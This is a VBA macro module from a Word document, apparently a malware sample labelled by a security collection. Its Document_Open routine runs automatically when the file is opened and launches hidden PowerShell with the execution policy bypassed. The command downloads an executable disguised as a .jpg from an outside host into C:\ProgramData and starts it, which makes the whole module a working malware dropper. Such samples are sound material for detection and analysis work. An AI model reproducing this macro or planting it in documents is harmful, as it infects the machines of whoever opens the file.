Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_New()

End Sub

Private Sub Document_Open()
Call Shell("Cmd /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://4.top4top.net/p_14521hc851.jpg','C:\ProgramData\1.exe');Start-Process 'C:\ProgramData\1.exe'")
End Sub


INQUEST-PP=macro
